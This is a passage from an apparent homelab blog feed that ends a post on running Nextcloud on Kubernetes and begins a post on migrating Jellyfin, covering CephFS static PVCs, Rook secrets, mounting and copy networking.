and then use env variables in the <code>command</code> via the <code>$(ENV_VAR)</code> syntax.
The problem: the <code>arch</code> label is defined on nodes, not on Pods, and the Downward
API only allows access to Pod labels, not node labels. So I finally had to reach
for the <code>uname -m</code> you see above. I was really surprised that k8s doesn&rsquo;t have
the capability to inject the node&rsquo;s arch into a container&rsquo;s env.</p>
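<p>For illustration, here is a minimal sketch of what the Downward API <em>can</em> do:
injecting a <em>Pod</em> label into an environment variable. The Pod and its <code>arch</code>
label are made up for this example; the point is that <code>fieldRef</code> only reaches
Pod metadata, so a node label like <code>kubernetes.io/arch</code> stays out of reach:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Pod
metadata:
  name: downward-api-demo   # hypothetical Pod, just for illustration
  labels:
    arch: amd64             # a Pod label, set by hand, not the node label
spec:
  containers:
    - name: demo
      image: busybox
      # $(POD_ARCH) is expanded by Kubernetes before the container starts
      command: [&#34;sh&#34;, &#34;-c&#34;, &#34;echo running with POD_ARCH=$(POD_ARCH)&#34;]
      env:
        - name: POD_ARCH
          valueFrom:
            fieldRef:
              # only Pod fields and labels are available here
              fieldPath: metadata.labels[&#39;arch&#39;]
</code></pre>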
<p>But that wasn&rsquo;t the end of my notify-push problems. Now that the container was
finally able to execute the binary, it errored out with this message:</p>
<pre tabindex="0"><code>Error: php_literal_parser::unexpected_token

  × Error while parsing nextcloud config.php
  ╰─▶ Error while parsing &#39;/var/www/html/config/config.php&#39;:
      No valid token found, expected one of boolean literal, integer literal,
      float literal, string literal, &#39;null&#39;, &#39;array&#39; or &#39;[&#39;
    ╭─[22:31]
 21 │           &#39;arguments&#39; =&gt; [
 22 │                   &#39;bucket&#39; =&gt; getenv(&#39;BUCKET_NAME&#39;),
    ·                               ┬
    ·                               ╰── Expected boolean literal, integer literal, float literal, string literal, &#39;null&#39;, &#39;array&#39; or &#39;[&#39;
 23 │                   &#39;autocreate&#39; =&gt; true,
    ╰────
</code></pre><p>Before switching to the version above, which uses environment variables to provide
the Nextcloud config values needed by the notify-push app, I was providing the
<code>config.php</code> file directly, which is supposed to work as well. I figured I had
the file already anyway, so why not use it?
But the PHP parser used by notify-push is not capable of actually executing PHP;
it expects all config options to be set to static values, and my config uses
<code>getenv()</code> calls.
That&rsquo;s why I ended up using the environment variables supported by the notify-push
binary to set the necessary configuration options.</p>
<p>After all of that, the Pod finally fully started, and I was able to log
in and found all of my files, calendars, contacts and so on in place.
I also went through the warnings shown in the admin interface and hit one
issue I&rsquo;d like to note here. The warnings told me that my mail settings had not
been tested, so I went into them and clicked the &ldquo;send test mail&rdquo; button.
This immediately showed an error:</p>
<pre tabindex="0"><code>AxiosError: Request failed with status code 400
</code></pre><p>I had absolutely no idea what it meant, as I knew that my mail server was working
as intended. It turned out that the issue wasn&rsquo;t with the mail server or the
Nextcloud mail config, but just the fact that I had never set a mail address
for the admin account I was working in. &#x1f926;</p>
<p>The last piece of the puzzle is the cron container. As I&rsquo;ve described above,
Nextcloud needs some regularly executed tasks. I&rsquo;m not enough of a web developer
to really have any experience with PHP, but from what I understand, PHP is request-oriented,
so it doesn&rsquo;t have a convenient place to put and execute cron tasks.
Anyway, I needed some way to regularly call the <code>cron.php</code> file to trigger these
maintenance tasks. The <a href="https://docs.nextcloud.com/server/latest/admin_manual/configuration_server/background_jobs_configuration.html">Nextcloud docs</a>
recommend hitting the <code>cron.php</code> file every five minutes. For that, I re-used the
Nextcloud container, because it already has everything that&rsquo;s needed onboard:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-cron</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;/usr/bin/bash&#34;</span>]
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;/cron-scripts/webcron.sh&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cron-script</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/cron-scripts</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">50m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">50Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SLEEPTIME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;5m&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">INITIAL_WAIT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;10m&#34;</span>
</span></span></code></pre></div><p>But instead of launching php-fpm, I run a simple bash script:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cron-script</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">webcron.sh</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    #!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    echo &#34;$(date): Launched task, sleeping for ${INITIAL_WAIT}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    sleep &#34;${INITIAL_WAIT}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    while true; do
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      curl http://127.0.0.1/cron.php 2&gt;&amp;1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      echo &#34;&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      echo &#34;$(date): Sleeping for ${SLEEPTIME}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      sleep &#34;${SLEEPTIME}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    done</span>
</span></span></code></pre></div><p>This does the job nicely while staying simple.</p>
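<p>Just as a side note: a Kubernetes CronJob would be another way to get the same
effect. I like the sidecar because it keeps everything inside one Pod, but a rough
sketch of the alternative could look like this (the Service hostname here is an
assumption, not my actual setup):</p>
<pre tabindex="0"><code>apiVersion: batch/v1
kind: CronJob
metadata:
  name: nextcloud-webcron
spec:
  schedule: &#34;*/5 * * * *&#34;
  jobTemplate:
    spec:
      template:
        spec:
          restartPolicy: Never
          containers:
            - name: webcron
              image: curlimages/curl
              command: [&#34;curl&#34;]
              # assumed Service name and namespace for the Caddy frontend
              args: [&#34;-fsS&#34;, &#34;http://nextcloud.nextcloud.svc.cluster.local/cron.php&#34;]
</code></pre>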
<h2 id="conclusion">Conclusion</h2>
<p>This one went quite well. I was expecting more problems, especially considering
that it sometimes looks like mine is the only Nextcloud deployment in the Homelabbing
community which runs without any issues. &#x1f605; I intentionally chose to not muck about with the setup
too much and instead copied my Nomad setup as much as possible, which made for
a relatively smooth migration.
I was reluctant to change too much, because I rely on Nextcloud for a lot of my
&ldquo;I would rather not be without this for more than a weekend&rdquo; needs. So being
a bit conservative with how much I change was in order.</p>
<p>I haven&rsquo;t decided what comes next yet - I might spend next week finishing some
blog post drafts instead of starting anything new, because at this point I&rsquo;ve mostly
got &ldquo;finish during the weekend because I need it during the week&rdquo; stuff left in
the migration.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 18: Migrating Jellyfin</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-18-jellyfin/</link>
      <pubDate>Thu, 20 Feb 2025 23:30:24 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-18-jellyfin/</guid>
      <description>Migrating my Jellyfin instance and media collection to the Kubernetes cluster</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Jellyfin instance to the k8s cluster.</p>
<p>This is part 18 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>I&rsquo;m running a <a href="https://jellyfin.org/">Jellyfin</a> instance in my Homelab to play
movies and TV shows. I don&rsquo;t have a very fancy setup, no re-encoding or anything
like that. I&rsquo;m just using Direct Play, as I&rsquo;m only watching things on my desktop
computer.</p>
<p>Jellyfin doesn&rsquo;t have any external dependencies at all, so there&rsquo;s only the
Jellyfin Pod itself to be configured. It also doesn&rsquo;t have a proper configuration
file. Instead, it&rsquo;s configured through the web UI and a couple of command line
options. For that reason, I won&rsquo;t have any Secrets or ConfigMaps. Instead I&rsquo;ve
just got a PVC with the config and some space for Jellyfin&rsquo;s cache and another
CephFS volume for the media collection.</p>
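<p>The config and cache volume is a regular claim. A minimal sketch of what it
could look like (the dynamic provisioning, storage class name and size are all
assumptions here, not necessarily what I&rsquo;m running):</p>
<pre tabindex="0"><code>apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: jellyfin-cache-and-conf
spec:
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 10Gi                    # assumed size
  storageClassName: rook-ceph-block    # assumed Rook RBD storage class
</code></pre>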
<p>Said media collection volume will be the main focus of this post, because
everything else about the setup follows my standard k8s app setup pretty closely.
I had originally planned to also dive a bit (okay, a lot &#x1f605;) into
the metrics of the copy operation, but that rather quickly turned into a
rabbit hole all its own, and so I decided to declare the beginning of operation
&ldquo;articles, not tomes&rdquo; and split it out into another post that will follow
shortly after this one.</p>
<h2 id="setting-up-the-media-volume">Setting up the media volume</h2>
<p>For my media volume, I had been using a CephFS volume in the Nomad job setup.
I had two reasons for this:</p>
<ol>
<li>I need to mount the volume twice and access it from two places: The Jellyfin
job, and my main desktop</li>
<li>Having &ldquo;unlimited&rdquo; space</li>
</ol>
<p>Ceph RBD volumes were out of the question, because those always need to have a
size set. They can&rsquo;t just grow to fill the entire space available in their Ceph
pool. CephFS volumes are different, though. By default, they don&rsquo;t have any
size restriction and can use the entire data pool of the CephFS they&rsquo;ve been
created on. This means I don&rsquo;t have to worry about extending the size at some
point.
At the same time, I also regularly copy new files onto the volume when expanding
my media collection. This happens from my desktop. So I also need the ability
to mount the volume on two machines at the same time, and to write to it from
both.</p>
<p>These two points make CephFS the perfect fit for the media volume. But that left
me with a problem: I needed a k8s PVC to mount into the Jellyfin Pod, and by
default, PVCs always have to have a capacity set. In my initial tests, I tried
just removing the size from the manifest of a test PVC, but k8s rejected it when
I tried to apply it. The same thing happened when I instead set the size to 0.</p>
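<p>For reference, this is roughly what I tried (reconstructed for this post, so
take it as a sketch): a PVC whose <code>storage</code> request is simply left out, which
k8s rejects on apply:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: media-test
spec:
  accessModes:
    - ReadWriteMany
  storageClassName: rook-cephfs   # assumed name of the dynamic CephFS class
  resources:
    requests: {}                  # no storage size, rejected by the API server
</code></pre>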
<p>So back to the drawing board it was. Luckily for me, <a href="https://beyondwatts.social/@beyondwatts">@beyondwatts</a>
pointed me to static PVCs, which can be used to make manually created CephFS
and RBD volumes available as PVCs in Kubernetes. This seems to be a feature of
the <a href="https://github.com/ceph/ceph-csi">Ceph CSI</a>. The documentation for the
feature can be found <a href="https://github.com/ceph/ceph-csi/blob/devel/docs/static-pvc.md">here</a>.</p>
<p>I created my new media volume (technically a <a href="https://docs.ceph.com/en/reef/cephfs/fs-volumes/">CephFS subvolume</a>)
with the following Ceph commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolumegroup create homelab-fs static-pvcs
</span></span><span style="display:flex;"><span>ceph fs subvolume create homelab-fs media static-pvcs
</span></span></code></pre></div><p>After creation, the <code>ceph fs subvolume info homelab-fs media static-pvcs</code> output
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;atime&#34;</span>: <span style="color:#e6db74">&#34;2025-02-11 22:46:35&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;bytes_pcent&#34;</span>: <span style="color:#e6db74">&#34;undefined&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;bytes_quota&#34;</span>: <span style="color:#e6db74">&#34;infinite&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;bytes_used&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;created_at&#34;</span>: <span style="color:#e6db74">&#34;2025-02-11 22:46:35&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ctime&#34;</span>: <span style="color:#e6db74">&#34;2025-02-11 22:46:35&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;data_pool&#34;</span>: <span style="color:#e6db74">&#34;homelab-fs-bulk&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;features&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;snapshot-clone&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;snapshot-autoprotect&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;snapshot-retention&#34;</span>
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;flavor&#34;</span>: <span style="color:#ae81ff">2</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;gid&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;mode&#34;</span>: <span style="color:#ae81ff">16877</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;mon_addrs&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;300.300.300.1:6789&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;300.300.300.2:6789&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;300.300.300.3:6789&#34;</span>
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;mtime&#34;</span>: <span style="color:#e6db74">&#34;2025-02-11 22:46:35&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;path&#34;</span>: <span style="color:#e6db74">&#34;/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;pool_namespace&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;state&#34;</span>: <span style="color:#e6db74">&#34;complete&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;subvolume&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;uid&#34;</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Note especially the <code>bytes_quota: infinite</code> part, which was what I was after.
Next, I created the PersistentVolume for it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolume</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jellyfin-media</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteMany</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">capacity</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">1Gi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">driver</span>: <span style="color:#ae81ff">rook-ceph.cephfs.csi.ceph.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">controllerExpandSecretRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-csi-cephfs-provisioner</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">nodeStageSecretRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-csi-cephfs-node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumeAttributes</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;fsName&#34;: </span><span style="color:#e6db74">&#34;homelab-fs&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;clusterID&#34;: </span><span style="color:#e6db74">&#34;rook-cluster&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;staticVolume&#34;: </span><span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;rootPath&#34;: </span><span style="color:#ae81ff">/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumeHandle</span>: <span style="color:#ae81ff">jellyfin-media</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">persistentVolumeReclaimPolicy</span>: <span style="color:#ae81ff">Retain</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumeMode</span>: <span style="color:#ae81ff">Filesystem</span>
</span></span></code></pre></div><p>I mostly copied this from another CephFS volume I already had as scratch space
for my backup setup. Important to note here is the <code>spec.csi.volumeAttributes.staticVolume: true</code>
entry as well as the <code>rootPath</code>.
The value for the root path can be found with the following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolume getpath homelab-fs media static-pvcs
</span></span></code></pre></div><p>The PersistentVolumeClaim then looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jellyfin-media</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteMany</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">1Gi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumeMode</span>: <span style="color:#ae81ff">Filesystem</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumeName</span>: <span style="color:#ae81ff">jellyfin-media</span>
</span></span></code></pre></div><p>Because it&rsquo;s a CephFS subvolume, I could use the ReadWriteMany access mode.</p>
<p>But when trying to launch a Pod using the PVC, I got this error message initially:</p>
<pre tabindex="0"><code>MountVolume.MountDevice failed for volume &#34;jellyfin-media&#34; : rpc error: code = Internal desc = failed to get user credentials from node stage secrets: missing ID field &#39;userID&#39; in secrets
</code></pre><p>This showed up in the Events of the Pod. The issue is mentioned in the <a href="https://rook.io/docs/rook/latest/Storage-Configuration/Shared-Filesystem-CephFS/filesystem-storage/#consume-the-shared-filesystem-across-namespaces">Rook Docs</a>,
and it needs to be solved by manually creating another Secret. I&rsquo;m not sure why
the Ceph CSI driver doesn&rsquo;t create that Secret automatically, as it&rsquo;s just a
copy of the <code>rook-csi-cephfs-node</code> Secret with different names for the data keys.</p>
<p>I did the copy by first fetching the <code>rook-csi-cephfs-node</code> secret:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n rook-cluster secrets rook-csi-cephfs-node -o yaml &gt; csi-secret.yaml
</span></span></code></pre></div><p>From that <code>csi-secret.yaml</code> I removed all of the runtime information added
by Kubernetes and then renamed the keys like this (the resulting Secret is sketched after the list):</p>
<ul>
<li><code>adminID</code> -&gt; <code>userID</code></li>
<li><code>adminKey</code> -&gt; <code>userKey</code></li>
</ul>
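<p>Put differently, the copy is a Secret that looks roughly like this (the Secret
name is my choice for this sketch, and the placeholder values stand for the data
copied from <code>rook-csi-cephfs-node</code>):</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Secret
metadata:
  name: rook-csi-cephfs-node-user   # assumed name for the manual copy
  namespace: rook-cluster
stringData:
  # same values as adminID/adminKey in rook-csi-cephfs-node,
  # just under the key names the static PVC code path expects
  userID: &lt;value of adminID from rook-csi-cephfs-node&gt;
  userKey: &lt;value of adminKey from rook-csi-cephfs-node&gt;
</code></pre>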
<p>I then applied the new Secret to the cluster and changed the
<code>spec.csi.nodeStageSecretRef.name</code> property of the PersistentVolume to the newly
created Secret. After that, the Pod was able to mount the static CephFS volume
without issue.
What I&rsquo;m still wondering about is why these static PVCs need this special
handling, even though dynamically created CephFS PVCs don&rsquo;t.</p>
<p>The last step of the preparation was to make sure that I could also mount the
CephFS subvolume on my desktop machine.
This, quite honestly, involved a bit of silliness. In my current configuration,
I just had the <code>name</code> option set for the mount, giving the Ceph user name to
use for authentication. The mount helper then automatically uses the <code>/etc/ceph/ceph.conf</code>
file to get the MON daemon IPs for initial cluster contact, and the <code>ceph.client.&lt;username&gt;.keyring</code>
file from the same directory for the key. I couldn&rsquo;t reuse that approach, because I&rsquo;ve
got other mounts from the baremetal cluster that I need to keep for now.</p>
<p>But as per the <a href="https://docs.ceph.com/en/reef/man/8/mount.ceph/">mount.ceph man page</a>,
there is a <code>secretfile</code> option. In my naivete, I thought that this option takes the
path to a keyring file. Which would make sense, because keyring files are
the way Ceph credentials are provided everywhere else. But no: the <code>secretfile</code>
option expects a file which contains <em>only</em> the key, and nothing else.
If you provide it with a full keyring file, the mount command will output an
error like this:</p>
<pre tabindex="0"><code>secret is not valid base64: Invalid argument.
adding ceph secret key to kernel failed: Invalid argument
couldn&#39;t append secret option: -22
</code></pre><p>With that finally figured out, I created the Ceph config file for the Rook
cluster with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph config generate-minimal-conf
</span></span></code></pre></div><p>Then I was able to mount the subvolume with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mount -t ceph :/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca /mnt/temp -o name<span style="color:#f92672">=</span>myuser,secretfile<span style="color:#f92672">=</span>/etc/ceph/ceph-rook.secret,conf<span style="color:#f92672">=</span>/etc/ceph/ceph-rook.conf
</span></span></code></pre></div><p>What I really like about working with Rook instead of baremetal Ceph is that I
can create additional users with Kubernetes manifests so I can version control
them, instead of having to document long sequences of commands in a runbook:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephClient</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">caps</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mds</span>: <span style="color:#e6db74">&#39;allow rw path=/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mon</span>: <span style="color:#e6db74">&#39;allow r&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">osd</span>: <span style="color:#e6db74">&#39;allow rw tag cephfs data=homelab-fs&#39;</span>
</span></span></code></pre></div><p>This will allow the user to access only that specific static volume in the
cluster.</p>
<h2 id="copying-the-media-collection">Copying the media collection</h2>
<p>My media collection has a size of about 1.7 TiB. I knew that copying it over
would take quite a while, so I planned to do it from my Command&amp;Control host.
But then I got a weird feeling and decided to check the networking diagram.
It looks something like this:
<figure>
    <img loading="lazy" src="copy-routing.svg"
         alt="This is a network diagram. It shows several hosts: The first two are &#39;Baremetal Ceph Host&#39; and &#39;Rook Ceph Host&#39;. They&#39;re both in the same VLAN. Then there is &#39;Copy Host&#39;, which is connected to a different VLAN. All of them are connected to the same switch. Also connected to that switch is the &#39;Router routing VLANs&#39;. The diagram shows a network flow starting at &#39;Baremetal Ceph Host&#39; and going into the router via the switch. Then from the router it goes over back to the switch to end up in the &#39;Copy Host&#39;. From there, the flow goes back out to the switch and to the router again, to then go back to the switch and end up in the Rook Ceph Host."/> <figcaption>
            <p>Network diagram with the packet flow for the copy operation.</p>
        </figcaption>
</figure>
</p>
<p>The issue here is the fact that my C&amp;C host, called the <em>Copy Host</em> here, is in a
different VLAN than the baremetal and Rook Ceph hosts. This means that some
routing needs to happen for packets to get between the Ceph hosts and the
copy host, which in turn means that all packets need to pass through the router.
This would be fine if the packets only needed to pass through the router once.
But in truth, they need to pass through the router twice, and they cross
the same NIC on the router even four times.</p>
<p>The packets go from the source, the baremetal Ceph cluster, up to the router via
the link from the switch. Pass Nr. 1. Then they go down that same link again to
reach the C&amp;C host on its VLAN. Pass Nr. 2. The C&amp;C host then sends them to the
router again, now with the Rook Ceph host as the destination. Pass Nr. 3.
And finally, the router sends the packets back down that link
between router and switch to arrive at the Rook Ceph host. Pass Nr. 4.</p>
<p>So because each packet passes the link twice in each direction, my maximum copy
speed is suddenly reduced to 500 Mbit/s, which is a mere 62 MByte/s, slower even
than the HDDs involved in this copy process.</p>
<p>I was contemplating which Homelab host to take out and install the necessary
tools on when <a href="https://hachyderm.io/@badnetmask">@badnetmask</a>, rightly, asked
why I didn&rsquo;t just launch a Pod somewhere. And that&rsquo;s what I ended up doing.</p>
